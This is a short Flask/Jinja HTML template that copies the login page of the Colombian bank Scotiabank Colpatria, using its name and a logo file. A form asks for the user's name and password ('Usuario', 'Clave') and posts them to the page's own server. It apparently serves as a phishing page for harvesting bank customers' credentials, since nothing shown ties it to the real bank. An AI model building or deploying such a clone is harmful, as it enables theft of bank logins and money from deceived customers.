<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <title>Scotiabank Colpatria</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>
<body>
    <div class="container">
        <img src="{{ url_for('static', filename='logocolpatria.jpg') }}" alt="Logo" class="logo">
        <form method="POST">
            <label for="usuario">Usuario</label>
            <input type="text" id="usuario" name="usuario" required>
            <label for="clave">Clave</label>
            <input type="password" id="clave" name="clave" required>
            <button type="submit" class="btn">Ingresar</button>
        </form>
    </div>
</body>
</html>
